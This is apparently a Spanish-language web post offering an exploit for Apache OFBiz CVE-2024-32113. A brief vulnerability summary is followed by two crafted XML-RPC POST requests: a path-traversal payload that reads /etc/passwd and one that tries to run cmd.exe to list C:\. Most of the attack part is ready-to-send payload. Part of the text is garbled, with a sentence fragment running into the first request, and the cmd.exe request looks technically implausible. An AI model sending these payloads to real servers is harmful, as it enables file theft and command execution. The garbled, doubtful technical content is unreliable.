
Exploit para Apache OFBiz CVE-2024-32113: path traversal mediante solicitudes XML-RPC manipuladas, que permite la lectura arbitraria de archivos y la posible ejecución de comandos en servidores vulnerables.
Se ha encontrado una vulnerabilidad clasificada como crítica en Apache OFBiz hasta la versión 18.12.12. Una funcionalidad desconocida se ve afectada por este problema. La manipulación con una entrada desconocida conduce a una vulnerabilidad de path traversal. El producto utiliza una entrada externa para construir una ruta destinada a identificar un archivo o directorio situado bajo un directorio principal restringido, pero el producto no neutraliza adecuadamente los elementos especiales dentro de la ruta que pueden hacer que esta se resuelva a una ubicación fuera del directorio restringido. Se ven afectadas la confidencialidad, la integridad y la disponibilidad.
../../../../../../etc/passwd para apuntar al archivo etc/passwd en el servidor Apache OFBiz.etc/passwd, que contiene información sensible sobre los usuarios del servidor.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>